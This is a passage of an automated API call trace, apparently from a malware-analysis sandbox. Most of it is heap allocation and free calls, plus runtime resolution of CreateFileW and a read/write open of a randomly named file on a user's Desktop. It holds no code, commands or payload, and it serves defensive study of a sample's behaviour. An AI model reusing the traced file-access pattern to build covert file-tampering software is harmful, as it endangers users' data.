(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0161.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0161.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0161.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.687] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0161.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0x9c5180 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0161.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gx8hb3o7amx5so9swzmc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.691] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0161.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | 